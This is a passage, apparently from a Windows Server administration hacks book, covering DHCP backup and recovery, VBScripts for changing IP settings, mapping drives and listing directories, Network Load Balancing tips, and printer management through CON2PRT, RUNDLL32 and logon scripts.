+each one create mutually exclusive exclusion lists. For example,
+if your network is using class C nonsubnetted network
+192.168.168.0/24, then, on both servers, you should create the
+scope with the start IP address 192.168.0.1 and the end IP
+address 192.168.168.254. Your choice of exclusion lists
+depends on whether you want both servers to share the load
+equally or whether one of them will be a primary choice for your
+
+DHCP clients. For example, to balance the load, you would
+configure the range 192.168.168.1-192.168.168.127 on the
+first server and 192.168.168.128-192.16.168.254 on the
+second.
+In order for this configuration to work, you have to ensure that
+broadcasts from DHCP clients will reach both servers. Typically,
+this is done either by installing DHCP relay agents on the
+servers that reside on clients subnet or by configuring routers
+as BOOTP Relay Agents.
+Backing Up the DHCP Database
+In addition to providing redundancy, you should also ensure
+regular backups of the DHCP database. Fortunately, the backup
+takes place automatically by default. Its behavior is determined
+by Registry entries that reside in the following key:
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DHCPServer\Parameters
+The Registry entries contain the following values:
+BackupDatabasePath
+Determines the location of the backup (set initially to
+%SystemRoot%\System32\DHCP\Backup).
+BackupInterval
+Determines the frequency of the automatic backup, in
+minutes (the default is 60).
+
+RestoreFlag
+Can be used to force the restore by using the existing
+backup (by setting RestoreFlag to 1). Typically, the
+operating system does this automatically if it detects
+the DHCP database corruption.
+Windows also automatically backs up the content of the Registry
+key HKLM\SOFTWARE\Microsoft\DHCPServer\Configuration to the
+DHCPCFG file, which resides in the Backup folder.
+Recovering the Database
+Recovering the database involves restoring both the database
+files and the Registry settings. You should first stop the DHCP
+server and then copy the files and load the Registry hive (using
+REGEDT32.EXE) to their target location by overwriting the
+existing HKLM\SOFTWARE\Microsoft\DHCPServer\Configuration
+Registry key. After you have restored the database file, you
+should change the default of 0 conflict-detection attempts (from
+the Advanced tab of Server properties in the DHCP MMC
+console) to a nonzero value (5 is the maximum).
+Another option is to use the NETSH command-line utility to back
+up and restore configuration of the DHCP server database.
+NETSH's functionality is provided through a number of helper
+DLLs, each dealing with a particular type of Windows networking
+component. NETSH allows you to dump the configuration of the
+DHCP server (including all superscopes, scopes, exclusion
+ranges, and reservations) into a text file that later can be used
+to restore. Note, however, that NETSH does not back up
+
+information about existing leases, which are stored in the DHCP
+database.
+To create the DHCP configuration dump file, execute the
+following command, where IPAddressOrName is the IP address or
+name of your DHCP server (note that this command can be
+executed remotely):
+NETSH DHCP SERVER IPAddressOrName DUMP > C:\DHCPCfg.txt
+To restore the DHCP server configuration settings using the
+same file, run this command:
+NETSH EXEC C:\DHCPCfg.txt
+Marcin Policht
+
+Hack 42 Change a Network Adapter's IP
+Info
+Changing TCP/IP settings via the GUI is tedious at best. It's
+accomplished more easily with a little VB scripting magic.
+Changing a machine's TCP/IP settings from the GUI usually
+involves a number of steps. This becomes tedious if you have to
+do it oftenfor example, if the machine is part of a testbed network
+where you test different deployment scenarios. Using the
+VBScript in this hack, you can quickly and frequently modify the
+network adapter information on a computer.
+The Code
+To use this script, type it into Notepad (with Word Wrap turned
+off) and save it with a .vbs extension as ChangeIP.vbs:
+Option Explicit
+Dim NetworkAdapter, AdapterConfiguration 'Objects
+Dim IPAddress, SubnetMask, Gateway, DNS 'String Arrays
+
+Dim RetVal 'Integers
+For Each NetworkAdapter In
+GetObject("winmgmts:").InstancesOf("Win32_NetworkAdapter")
+If NetworkAdapter.AdapterType = "Ethernet 802.3" Then
+For Each AdapterConfiguration In GetObject("winmgmts:").InstancesOf
+("Win32_NetworkAdapterConfiguration")
+If UCase(AdapterConfiguration.ServiceName) = UCase(NetworkAdapter.ServiceName) Then
+IPAddress = Array("192.168.0.10")
+SubnetMask = Array("255.255.255.0")
+Gateway = Array("192.168.0.1")
+DNS = Array("35.8.2.41")
+RetVal = AdapterConfiguration.EnableStatic(IPAddress, SubnetMask)
+If Not RetVal = 0 Then
+WScript.Echo "Failure assigning IP/Subnetmask."
+End If
+RetVal = AdapterConfiguration.SetGateways(Gateway)
+
+If Not RetVal = 0 Then
+WScript.Echo "Failure assigning Gateway."
+End If
+RetVal = AdapterConfiguration.SetDnsServerSearchOrder(DNS)
+If Not RetVal = 0 Then
+WScript.Echo "Failure assinging DNS search order."
+End If
+End If
+Next
+End If
+Next
+Running the Hack
+To run this hack, modify the IP information in the following lines,
+as required by your environment:
+IPAddress = Array("192.168.0.10")
+SubnetMask = Array("255.255.255.0")
+Gateway = Array("192.168.0.1")
+
+DNS = Array("35.8.2.41")
+For example, to change the IP address of a machine to
+172.16.44.3 with subnet mask 255.255.0.0 and default
+gateway 172.16.44.1, replace those lines with these:
+IPAddress = Array("172.16.44.3")
+SubnetMask = Array("255.255.0.0")
+Gateway = Array("172.16.44.1")
+Also, note this statement:
+If NetworkAdapter.AdapterType = "Ethernet 802.3" Then
+This is where the script checks the AdapterType, which in this
+script is listed as "Ethernet 802.3". You should modify this line if
+you have a different networking environment.
+Once these changes have been made to the script, create a
+shortcut to the script and double-click on the shortcut to run the
+script.
+Rod Trent
+
+Hack 43 Change from Static IP to DHCP
+Reconfiguring a network from static IP addressing to DHCP is a
+chore no system administrator wants to do, but now there's
+help.
+Companies grow over time, and their networks have to grow
+along with them. This means that the static IP addressing that
+was used when the network was small will no longer practical
+once the systems number more than a few dozen. Unfortunately,
+changing machines from static to dynamic addressing usually
+means visiting each machine, logging on as a local
+administrator, and clicking through numerous properties sheets
+to reconfigure TCP/IP settings for network adapters.
+However, there's an easier way. The VBScript in this hack uses
+Registry writes to change the TCP/IP settings on a machine
+from static IP to DHCP.
+The Code
+Type the script into Notepad (with Word Wrap disabled) and save
+it with a .vbs extension as Static2DHCP.vbs:
+'All variables declared
+Option Explicit
+
+Dim oWSHShell
+Dim sNIC, sMan
+Dim iCount
+Set oWSHShell = WScript.CreateObject("WScript.Shell")
+' Set the DCHP service to autostart
+oWSHShell.RegWrite "HKLM\SYSTEM\CurrentControlSet\Services\DHCP\Start", 2
+' Get Network card
+On Error Resume Next
+iCount = 1
+Do
+sNIC = oWSHShell.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\ " & _
+"CurrentVersion\NetworkCards\" & iCount & "\ServiceName")
+sMan = oWSHShell.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\ " & _
+
+"CurrentVersion\NetworkCards\" & iCount & "\Manufacturer")
+' Skip the Async and NDIS services
+If sMan <> "Microsoft" And Err.Number = 0 Then
+Call SetNIC
+End If
+iCount = iCount + 1
+Loop Until Err.Number <> 0
+' Clear the error
+Err.Clear
+' End of Script
+Sub SetNIC
+Dim iTest
+' Set the NIC service to use DHCP
+
+sNIC = "HKLM\SYSTEM\CurrentControlSet\Services\" & sNIC &"\Parameters\TCPIP\"
+iTest = oWSHShell.RegRead(sNIC & "EnableDHCP")
+If iTest = 0 Then
+oWSHShell.RegWrite sNIC & "EnableDHCP", 1, "REG_DWORD"
+oWSHShell.RegWrite sNIC & "IPAddress", "0.0.0.0", "REG_MULTI_SZ"
+oWSHShell.RegWrite sNIC & "SubnetMask", "0.0.0.0", "REG_MULTI_SZ"
+End If
+End Sub
+Running the Hack
+To run this hack, call the Static2DHCP.vbs script from a logon
+script and use Group Policy to assign this logon script to users'
+machines. When a user next logs on to his machine, the
+machine's TCP/IP settings will be changed from static to
+dynamic addressing. To lease an address from the DHCP server,
+the user's machine needs to be rebooted, so you could also send
+out a message asking all users to reboot their machines using
+the method in [Hack #35] or some other approach. If you like,
+the logon script could also be combined with the SU utility from
+the Windows 2000 Server Resource Kit to perform a hands-off
+migration from static to dynamic addressing.
+Rod Trent
+
+Hack 44 Release and Renew IP
+Addresses
+Using this handy script, you can release and renew a dynamically
+assigned IP address with a click of the mousewell, two clicks,
+actually.
+Troubleshooting DHCP lease problems is frustrating when it
+involves users' desktop machines, because help desk personnel
+have to explain to users how to open a command prompt, use the
+ipconfig command, and interpret the output. It would be nice if
+there were a way to release and renew a machine's IP address
+without having to go through such techie steps.
+Well, it turns out there is such a way; just use this handy
+VBScript to release and renew IP addresses assigned through
+DHCP.
+The Code
+Type the script into Notepad (with Word Wrap disabled) and save
+it with a .vbs extension as ReleaseRenew.vbs:
+On Error Resume Next
+Dim AdapterConfig
+
+Dim RetVal
+Set AdapterConfig = GetObject("winmgmts:Win32_NetworkAdapterConfiguration")
+'WMI release IP Address for all installed network adapters
+RetVal = AdapterConfig.ReleaseDHCPLeaseAll
+'if retval = 1 then display success. If 0 then failure
+If RetVal = 1 Then
+MsgBox "IP Address Release was successful."
+Else
+MsgBox "DHCP Release failed!"
+End If
+'WMI renew ip for all network adapters
+RetVal = AdapterConfig.RenewDHCPLeaseAll
+'if retval = 1 then display success. If 0 then failure
+If RetVal = 1 Then
+
+MsgBox "IP Address Renew was successful."
+Else
+MsgBox "DHCP Renew failed!"
+End If
+Set AdapterConfig = Nothing
+Running the Hack
+Copy the script to users' machines and create a shortcut to the
+script on their desktops. Then, when a user has IP address
+problems and can't talk to the network, tell her to double-click
+on the shortcut to release and renew her address, and see if that
+fixes things. If not, escalate to the next level of troubleshooting!
+Rod Trent
+
+Hack 45 Use netsh to Change
+Configuration Settings
+You can use the Windows 2000 Netshell (netsh) command to do
+some amazing things, including switching your machine between
+two different network configurations.
+If you move your machines around a lot, you know the pain of
+having to reconfigure their network settings so they can
+continue to talk on the network. This sort of thing is common in a
+testbed environment where you are building and testing different
+network-deployment scenarios prior to rolling out the real thing.
+You might also have to reconfigure network settings for your
+computers if you have a routed network with several subnets in
+one building and frequently move machines from one subnet to
+anothera common scenario in a physics lab or similar academic
+environment. Otherwise, if you have a laptop that you need to
+use at work, at home, and at the sites of several clients, being
+able to save and reload network configurations would be a real
+timesaver.
+There are a few utilities on the market that allow you to quickly
+switch between different network configurations. NetSwitcher
+(http://www.netswitcher.com) is one effective tool. But did you
+know you can do the same thing using the Windows 2000
+Netshell (netsh) command?
+
+Using netsh
+Here's how it works. First, you dump your network settings to a
+text file through the command line, as follows:
+netsh -c interface dump > NetworkSettings.txt
+This command stores your current network settings in a text file
+named NetworkSettings.txt. Now, let's say you have to
+reconfigure your machine's network settings to repurpose the
+machine or move it to a different part of the network. Then, later,
+if you need to restore your machine's original network settings,
+you can simply type the following command and load back in the
+previously dumped settings:
+netsh -f NetworkSettings.txt
+Note that the destination filename is not important, so you can
+effectively create multiple configuration files. You can create and
+name one for each network configuration you need. For example,
+you can use Work.txt for the office, Home.txt for your home
+configuration, and something like Client.txt to hold the values for
+a network you are temporarily visiting.
+Rod Trent
+
+Hack 46 Remove Orphaned Network
+Cards
+Moving a network adapter card to a new PCI slot in Windows
+2000/XP can sometimes cause unexpected results.
+If you swap out a network interface card (NIC) or move it into a
+different PCI slot but neglect to run the PnP Hardware Removal
+wizard or use Device Manager to do so, you might end up with an
+orphaned NIC. When you perform your hardware change with the
+card, power up the system, and log into Windows 2000/XP, the
+hardware wizard might display a message telling you that it
+detected a change. When you go to configure the network card's
+TCP/IP settings and try to save them, it will say "Hey, those
+settings are associated with this network card. Are you sure you
+want to use them for this one?" Then you'll realize the error you
+made. So, how do you remove the configuration settings for that
+orphaned NIC?
+To remove your orphaned NIC, you first need to know the
+Registry keys associated with it. This is the first such key:
+HKLM\Software\Microsoft\WindowsNT\CurrentVersion\NetworkCards
+You might see one or more subkeys numerically incremented.
+Selecting the subkey shows you two values:
+Description
+
+This contains the displayed description of the network
+card.
+ServiceName
+This is the GUID of the network card that is referenced
+in the Services section of HKLM where the TCP/IP
+configuration information is maintained, and also under
+the Enum\PCI section where the configuration parameters
+of the network card are maintained.
+This is another important key:
+HKLM\System\CurrentControlSet\Services\{GUID}
+Within this key, the Parameters\Tcpip subkey contains the TCP/IP
+configuration settings for the network card, including the DHCP
+server IP address, the lease information (if you're using DHCP),
+the subnet mask, and so on.
+Here is the third key:
+HKLM\System\CurrentControlSet\Services\{ServiceName of Network Card
+This key represents certain driver parameters related to error
+control, path to the driver file, and so on. The Enum subkey also
+points to the PnP Instance ID of the device, if you want a
+shortcut to where in the HKLM\System\Enum section of the Registry
+the device is maintained.
+This is the fourth key:
+HKLM\System\CurrentControlSet\Control\Network\{GUID}
+This key stores all information related to devices that serve as
+communications media to transmit/receive data between
+
+devices, such as network cards, infrared ports, and so on. It also
+contains configuration information for the key Microsoft Network
+services, such as File & Printer Sharing, QoS, and so on. Each
+device/adapter has a GUID subkey under this section of the
+Registry, where you can find the information related to that
+device. For the network cards, find the appropriate GUID and
+under this fourth key is the Connection subkey that maintains
+information related to PnP and the name of the connection (as
+you see when you go to Start Settings Network & Dialup
+Connections). The PnpInstanceID value is what we are interested
+in, because it points to a section of the Registry that maintains
+configuration information for Plug and Play devices.
+Finally, this is the last key you need to know about:
+HKLM\Enum\PCI\{PnPInstanceID}
+This key and its subkeys maintain information specific to the
+card, such as the PCI Bus it is installed in, driver information,
+and so forth.
+Once you find all this information, you can delete those keys
+related to the card that was once there in the system. Then, you
+will no longer have to worry about issues of conflicting TCP/IP
+information between the old card and the new one or orphaned
+information that may or may not cause conflicts later on.
+Use this hack at your own riskmaking any
+changes in the Registry could have dire
+consequences. Make a backup first and
+get comfortable with what you are
+modifying/removing before proceeding with
+the recommended steps in this hack.
+
+Matt Goedtel
+
+Hack 47 Implement Windows 2000
+Network Load Balancing
+If you need network load balancing software on your network,
+why not try the NLB component that comes with Windows 2000
+Advanced Server?
+Installing Windows Network Load Balancing (NLB) is often a
+terrific idea. Most network load balancing hardware devices
+today cost over $20,000. Thus, if your web application or
+content site is not necessarily going to support traffic as heavy
+as http://www.msn.com, NLB is a great choice.
+However, this mighty piece of web-balancing code from Microsoft
+has a few implementation gotchas that can crop up at any
+minute. Let's quickly review the basics, which most you probably
+already know. You can run NLB only on Windows 2000 Advanced
+Server, Windows 2000 Datacenter Server, or any edition of
+Windows Server 2003. NLB also has a role in Microsoft
+Application Center, but the concept is the same.
+The following tips provide successful techniques to use with
+NLB.
+Two NIC Environment
+Plan on a two-NIC environment. For instance, identify a private
+
+network for Windows network activity, such as domain-level
+functions, file sharing, or name resolution. Identify the second
+NIC as the public- or client-facing connection. While NLB
+supports both unicast and multicast routing, using two NICS
+lets you avoid the complexities of using multicast mode.
+However, if you do want to use multicast mode with NLB, then
+either use a VLAN for all NLB NIC connections (which prevents
+saturating your Layer 2 network switches) or use a hub (that's
+right, a nonswitched hub) for all NLB NICs and allow the hub to
+make one connection to the Layer 2 switch front-ending your
+web farm. For security reasons, ensure also that the NLB NIC is
+stripped of all services, such as File and Print Sharing and the
+Microsoft network client.
+However, if you want to go home from work early, don't even try
+to run NLB on one NIC using multicast mode. The underlying
+technical challenge for Layer 2 switches and NLB is that the
+NLB-based NICs create a dummy MAC address and provide it
+to the MAC address table of the switch to which they are
+connected. NLB has to receive all traffic addresses to the NLB
+cluster for the software algorithm in use to make a decision on
+which node to send the traffic to. Some Layer 2 switches get
+confused at the same MAC address coming through different
+ports, and this can create the dreaded broadcast storm.
+Sample Environment
+The scenario shown in Figure 4-3 illustrates Microsoft Network
+Load Balancing in use in a standard Microsoft n-tier highly
+available Internet configuration. The three front-end IIS web
+servers (the dark shaded area in Figure 4-3) all are running
+Windows 2000 Advanced Server and illustrate the redundancy
+and load balancing archived with an NLB solution. Each web
+
+server has its own internal or primary IP address of the form
+10.0.0.x, which is a nonroutable address for security and
+management purposes, while the clustered or shared IP
+addresses are of the form 192.168.18.x. The firewall in front of
+the web farm is configured to perform a network translation of the
+actual hosted web site's DNS name and IP address to the
+listening IP address 192.168.18.158 of NLB. In this case,
+equal load balancing is used, such that each web server will
+carry 33% of the load so that NLB will load-balance traffic based
+on an equal distribution of the incoming traffic. If one server
+goes down, the load will be distributed to the remaining two
+servers.
+Figure 4-3. Using Network Load Balancing in an
+n-tier configuration
+
+Other Microsoft high-availability technologies can also be seen
+in this examplefor example, the use of a SQL Server cluster (the
+light-shaded area in Figure 4-3) providing backend database
+services for this solution. This illustrates the relationship
+between Microsoft Clustering Services (MSCS) and Microsoft
+Network Load Balancing (NLB): generally, they secure different
+tiers of highly available Microsoft solutions. In this case, NLB is
+used for the web tier, while clustering is used for the database
+tier.
+These tips and the corresponding scenario should save you
+considerable time when implementing NLB web clusters using
+Windows 2000/2003. The main thing to remember, though, is to
+never fall for the one NIC multicast option when using Microsoft
+Network Load Balancing.
+
+Chapter 5. File and Print
+Hacks #48-53
+Section 48. Map Network Drives
+Section 49. Determine Who Has A Particular File Open
+on the Network
+Section 50. Display a Directory Tree
+Section 51. Automate Printer Management
+Section 52. Set the Default Printer Based on Location
+Section 53. Add Printers Based on Name of Computer
+
+Hacks #48-53
+File and print is the traditional bread and butter of networking,
+and while it's gradually being overtaken by more advanced
+document-management solutions, not may companies are
+planning on retiring their file servers soon. Managing shared
+folders and printers also makes up a major component of an
+administrator's daily routine, and a high proportion of calls to the
+help desk as well. So it's worth examining some new ways to do
+old tasks, such as mapping drives or configuring default printers,
+as well as some ways to perform tasks that are not easy using
+standard Windows tools, including mapping the structure of a
+directory or determining who has a certain file open on the
+network. That's what this chapter is aboutdoing old tasks in new
+ways and making complex tasks simple.
+
+Hack 48 Map Network Drives
+This quick way to map a network drive can replace the
+traditional approach of using batch files.
+Using VBScript, you can easily map drive letters to shared
+folders on your network. This approach allows you to use
+VBScript to map and unmap network drivesfor example, in logon
+scripts. It also allows you greater flexibility in customizing
+scripts to perform actions across a network and doesn't require
+the net use command to work.
+Basically, the script creates the Network scripting object and
+then uses the MapNetworkDrive method to assign a drive letter to
+a network share. I've included examples of code for both
+mapping and unmapping network drives.
+The Code
+First, here's the code for mapping a network drive:
+Dim net
+Set net = CreateObject("WScript.Network")
+net.MapNetworkDrive "Z:", "\\server\share"
+
+And here's code for unmapping a network drive:
+Dim WshNetwork
+Set WshNetwork = WScript.CreateObject("WScript.Network")
+WshNetwork.RemoveNetworkDrive "Z:"
+Running the Hack
+To use the first snippet of code, type it into Notepad (with Word
+Wrap disabled) and save it with a .vbs extensionfor example, as
+map.vbs. Then modify this line to specify the drive letter and
+share you want to map:
+net.MapNetworkDrive "Z:", "\\server\share"
+For example, to map the drive letter K: to the Sysback share on a
+file server with an IP address of 172.16.11.230, change the line
+to:
+net.MapNetworkDrive "K:", "\\172.16.11.230\Sysback"
+Then, run the script either by creating a shortcut to it and
+double-clicking on the shortcut, by opening a command prompt
+and typing cscript.exe map.vbs, or by calling it from a batch file
+using a line like this (where path is the absolute path to where
+the script is located):
+cscript //nologo path\map.vbs
+To unmap this drive, type the second code snippet into Notepad,
+save it as unmap.vbs, and change this line:
+WshNetwork.RemoveNetworkDrive "Z:"
+
+to this:
+WshNetwork.RemoveNetworkDrive "K:"
+Then, run the script using any of the methods described
+previously.
+Rod Trent
+
+Hack 49 Determine Who Has A Particular
+File Open on the Network
+Using the Hyena utility, quickly find out which user on your
+network has a particular file open.
+One of the biggest problems for system administrators is
+dealing with help-desk or user requests that ask you to see who
+has a particular document open on the network. This can be
+most effectively completed using a utility called Hyena from
+SystemTools.com (http://www.systemtools.com). With this
+utility, you can even disconnect the user who has the open file or
+send her a message asking her to close the file in question.
+Here's a quick walkthrough on how to use the product, so you
+can see how easy it is to use. Start Hyena and begin by
+selecting the server name where the file is stored. Expand the +
+sign and the Shares leaf, and select the share you want to
+examine. Then, drill through the directories until you find the
+subdirectory you want, such as SqlDev in Figure 5-1.
+Figure 5-1. Finding open files in Hyena
+
+Now, select the file you want (SMS_ABC_Database.mdb in our
+example) in the right pane to see who has it open. Right-click it,
+and from the context menu select More Functions and then Open
+By (Figure 5-2).
+Figure 5-2. Selecting an open file
+
+Now, in the menu to the right, you will see who the user is by
+examining the User Name column, as shown in Figure 5-3.
+Figure 5-3. Viewing who has the file open
+
+Now it is just a matter of either sending the user a message or, if
+he is unavailable, disconnecting him, by right-clicking on the file
+and choosing the appropriate menu option (Figure 5-4). If you
+opt for the latter, keep in mind that the file will be closed without
+giving the user the opportunity to make any final changes.
+Figure 5-4. Disconnecting the user
+
+You can download a free, 30-day, fully functional, evaluation
+copy of this great tool from
+http://systemtools.com/hyena/download_frame.htm. Enjoy!
+Don Hite
+
+Hack 50 Display a Directory Tree
+Using some simple coding, you can display a complete map of a
+directory structure from a command prompt.
+The Explorer interface makes it easy to browse directories on a
+Windows machine, but it doesn't provide a simple method to
+document the structure of directories and their subdirectories.
+For troubleshooting purposes, it's helpful to know the directory
+structure on file servers where users store their work. This
+VBScript simplifies the process of documenting a directory's
+structure by allowing you to view such structure from the
+command line. Alternatively, by redirecting the output of the
+command to a text file, you can print a permanent record of the
+structure of your directories.
+The Code
+Type the following code into Notepad (with Word Wrap turned off)
+and save the file with a .vbs extension as vbtree.vbs:
+' Show simple directory tree
+Option Explicit
+
+Dim sArg, oFSO
+Set oFSO = CreateObject("Scripting.FileSystemObject")
+' Get folder (default is current directory)
+If Wscript.Arguments.Count > 0 Then
+sArg = Wscript.Arguments(0)
+Else
+sArg = "."
+End If
+sArg = oFSO.GetAbsolutePathName(sArg)
+' Process entire tree (if valid folder)
+If oFSO.FolderExists(sArg) Then
+Wscript.Echo "Folder tree for:", sArg
+ShowTree "", oFSO.GetFolder(sArg)
+End If
+Set oFSO = Nothing
+
+Wscript.Quit(0)
+Sub ShowTree(sIndent, oFolder)
+Dim oSubFolder, ix
+ix = 1
+For Each oSubFolder In oFolder.SubFolders
+Wscript.Echo sIndent & "+--" & oSubFolder.Name
+If ix <> oFolder.SubFolders.Count Then
+ShowTree sIndent & "| ", oSubFolder
+Else
+ShowTree sIndent & " ", oSubFolder
+End If
+ix = ix + 1
+Next
+End Sub
+Running the Hack
+
+The script is hardcoded by design to display the structure of the
+current directory. Place the script into to directory whose
+structure you want to display, such as C:\data. Then, open a
+command prompt, change the current directory to C:\data, and
+type cscript vbtree.vbs to display the tree of subdirectories
+under the current directory (Figure 5-5). Alternatively, you can
+type cscript vbtree.vbs > tree.txt to redirect the output of the
+script to a text file for documentation purposes.
+Figure 5-5. Displaying the tree of subdirectories
+under C:\data
+Make sure you have the latest scripting engines on the
+workstation from which you run this script. You can download
+current scripting engines from the Microsoft Scripting home
+page (http://msdn.microsoft.com/scripting/).
+Rod Trent
+
+Hack 51 Automate Printer Management
+Here are a couple nifty ways to manage printers from the
+command line instead of via the GUI.
+Managing printer mappings tends to be complicated task,
+especially in larger environments. Increased level of difficulty
+results from the fact that, in such situations, printers are shared
+(rather than used by individual users). Shared printer devices
+are typically network-attached (i.e., they either have internal
+network cards or are connected to external hardware-based print
+servers). This differs from a home/small office setup, where
+printing devices connect to individual workstations via parallel,
+USB, or infrared port.
+The way printer software is installed also varies by connection.
+Local printers are either autodetected (in Windows 2000 and
+XP) or installed via the Add Printer wizard. In the case of
+network-attached devices, printers are first installed with the
+Add Printer wizard on a network server. Next, users connect to
+these printers (either by double-clicking on the printers' icons in
+My Network Places/Network Neighborhood or by running the Add
+Printer wizard), which triggers automatic download of printer
+drivers and their configuration on the local workstations. The
+printer mappings are stored as part of a user's profile.
+Since the process of connecting to network printers is
+straightforward, you can leave this task to users. This is a viable
+solution, as long as printers are easy to find (e.g., by
+implementing a naming convention that clearly identifies the
+
+printer's location). This, however, is not always the case.
+CON2PRT
+If you want to be able to manage printer mappings easily, you
+can use the CON2PRT command, which has been available since
+the release of the Zero Administration Kit for Windows NT 4.0.
+CON2PRT allows you to map network printers from the command
+line and is extremely easy to use. It works with Windows NT 4.0,
+2000, and XP and can easily be included in a login script. Its
+only limitation is the fact that it cannot be used to force the
+installation of the locally attached printer, but this, fortunately, is
+rarely needed (since, with Windows 2000 and XP, local printers
+are usually autodetected).
+The CON2PRT command offers three functions:
+CON2PRT /f
+Deletes all existing printer mappings
+CON2PRT /c
+Creates a new printer mapping
+CON2PRT /cd
+Creates a new printer mapping and sets it as the default
+
+For example, to set a default printer to the printer LJ4000_PS_01
+on the server SERVER01, you would type in the following:
+CON2PRT /cd \\SERVER01\LJ4000_PS_01
+You can find the complete syntax of CON2PRT by typing the
+standard /? switch at the command prompt, and download
+CON2PRT.EXE (along with the rest of the Zero Administration Kit
+for Windows) from
+http://www.microsoft.com/ntworkstation/downloads/Recommended/Featured/NTZAK.asp
+RUNDLL32
+While CON2PRT is easy to use, its capabilities are limited to
+removing all printer mappings and creating new ones (including
+setting the default printer). Though it seems that this might be
+all you need when dealing with printers, Windows offers much
+wider range of functionality.
+As you probably know, most of the features used by Windows in
+the traditional 32-bit Windows environment are implemented in
+the form of Dynamic Link Libraries (DLLs, files with the
+extension .dll). As the name indicates, DLLs are collections
+(libraries) of functions that can be used whenever they are
+needed (dynamically) by any process operating within Windows.
+Unfortunately, access to functions included in the DLL files, in
+general, is restricted primarily to programmers. However, there
+are exceptions to this rule. For example, you can take advantage
+of certain specifically designed DLLs by running the RUNDLL32
+command that is included in every 32-bit version of Windows.
+Keep in mind, though, that the number of functions available with
+RUNDLL32 is fairly small (for example, it does not include any of
+the Win32 API calls exported from the system DLLs).
+
+Printer-management functions used by RUNDLL32 are stored in the
+printui.dll file. To find out the collection of functions included in
+this file, you can run the following from the command prompt or
+Start Run box:
+rundll32 printui.dll,PrintUIEntry /?
+This will display a long list of options available to you. In
+general, you use the following syntax of commands (where
+options and commandfile parameters vary):
+rundll32 printui.dll,PrintUIEntry options commandfile
+Here are just a few of many possible uses of this command:
+Delete a local printer (called HP LaserJet 5)
+rundll32 printui.dll,PrintUIEntry /dl /n "HP LaserJet 5"
+Delete the local printer on the remote computer (called
+RemotePC01)
+rundll32 printui.dll,PrintUIEntry /dl /n "HP LaserJet 5"
+/c\\RemotePC1
+Delete a network printer
+rundll32 printui.dll,PrintUIEntry /dn /n
+"\\SERVERNAME\PRINTERNAME"
+
+Add a network printer
+rundll32 printui.dll,PrintUIEntry /in /n
+"\\SERVERNAME\PRINTERNAME"
+Set a printer as the default
+rundll32 printui.dll,PrintUIEntry /y /n
+"\\SERVERNAME\PRINTERNAME"
+Marcin Policht
+
+Hack 52 Set the Default Printer Based on
+Location
+Using a combination of Group Policy and logon scripts, you can
+easily assign different default printers to different users.
+At the college, where I work, we use mandatory profiles for
+students, who log into Windows XP machines in three different
+computer labs in a Windows 2000 Active Directory environment.
+Each lab has its own networked printer, which should be used by
+students working in that lab. But the profile can have only one
+default printer set, which obviously wouldn't work, since
+students in two labs would default to a printer that wasn't in their
+room.
+The Code
+Here is the quick and dirty VBScript that solves the problem:
+set net = CreateObject("WScript.Network")
+workstation=net.computername
+location=left(workstation,2)
+printername=""
+
+select case location
+case "L1" printername="L1 LaserJet"
+case "L2" printername="L2 LaserJet"
+case "L3" printername="L3 LaserJet"
+End Select
+if printername<>"" then net.SetDefaultPrinter(printername)
+set net = Nothing
+Running the Hack
+The script looks at the first two characters of the computer
+name (this specifies which lab the computer is located in) and
+then sets the default printer accordingly. If the student is
+logging on to a computer that's not in one of the labs, the default
+printer isn't changed. If you name printers differently in your own
+environment, you might have to customize the script further as
+needed.
+We run this script in our own environment by specifying it as a
+logon script using Group Policy (so legacy Windows 98
+machines ignore it), because all our labs have Windows XP
+anyway. All our machines also have the necessary drivers
+installed and configured, and the printers have the same names,
+so we just have to change the default printer.
+Peter Rysavy
+
+Hack 53 Add Printers Based on Name of
+Computer
+Here's a logon script you can use to solve a complicated problem
+in printer management: performing a logon task based on the
+name of the computer being logged into.
+In various forums, I have noticed questions regarding how to
+perform tasks at logon based on the name of the computer that
+the user is logging into. In my environment (a small community
+college), we thought we could have fewer servers and reduce
+network traffic by configuring all our computers to use TCP/IP
+printing. This worked out pretty well for a while, but we
+discovered a few drawbacks of using TCP/IP printing. For
+example, there is no control over excessive printing and it is not
+possible to track costs back to a user. Also, it is difficult to
+update systems when printers get replaced
+We soon split our thinking and were able to switch 99% of our
+student computers to print through a few servers. To assist us
+with our print-management needs, we purchased Print Manager
+Plus (http://www.printmanagerplus.com). Print Manager Plus has
+many benefits for my environment. We are an educational
+institution that has a number of open-use areas where students
+and the public can use our computers. We do not track printing
+costs back to users, and we were experiencing a rising cost of
+print supplies due to misuse of our printers. The implementation
+of Print Manager Plus allowed us to put controls in place that
+limit abuse in the following ways:
+
+The user is able to print only 8 pages at a time. If the
+user's document is 10 pages long, he must print pages
+1-8, then 9-10.
+There is a limit on the file size of the print job. The user
+is unable to print a document that is larger than 15MB
+when it arrives at the server.
+Print Manager Plus has the ability to inform the user when he
+exceeds the defined limits. I have customized the messages
+sent from Print Manager Plus to the user so that they present
+him with options on how to print the document in question.
+Server-based printers, however, created a few headaches of their
+own. In particular, any room is pretty much fair game for us to
+use when we provide training to not only our students, but also
+our faculty and staff. We needed a way to set the right printer on
+any given computer for any user who logs on. Also, we wanted to
+use one logon script for all users in any domain.
+We also had a Windows 2000 Terminal Server available but had
+not made good use of it until recently. The original thinking was
+to install a bunch of printers on it and trust users to select the
+appropriate printer before hitting the print button. We soon had
+calls asking, "What are all these documents coming out of my
+printer?"
+Anyway, I thought about this awhile and decided that the best
+approach would be to add the printers based on the name of the
+computer. We have a standard naming convention in use that
+made this task possible.
+This hack contains the code that I came up with. The code
+should be pretty readable by itself, but I'll spend some time
+
+briefly discussing some of its more major parts.
+The Code
+To get the code for the script, I suggest downloading the
+Logon.vbs file from the O'Reilly web site
+(http://www.oreilly.com/catalog/winsvrhks/), because it's too
+long to type from scratch. This version of the script was tested
+on Windows 2000 Service Pack 2 running Internet Explorer 6
+Service Pack 1 with Microsoft Windows Script v5.6. It was also
+tested on Windows XP Professional participating in a small
+Active Directory domain.
+I have had a variation of this script in
+production for a long time now with great
+success. But, as always, either the
+differences in your environment or
+something I missed in editing the script
+for this hack might cause things behave
+unexpectedly.
+Depending on your environment, the code requires:
+A recent version of Internet Explorer
+(http://www.microsoft.com/windows/ie/default.asp).
+
+Windows Script 5.6 for Windows 98/ME/NT
+(http://www.microsoft.com/downloads/details.aspx?
+FamilyID=0a8a18f6-249c-4a72-bfcf-fc6af26dc390)
+Windows Script for 2000/XP
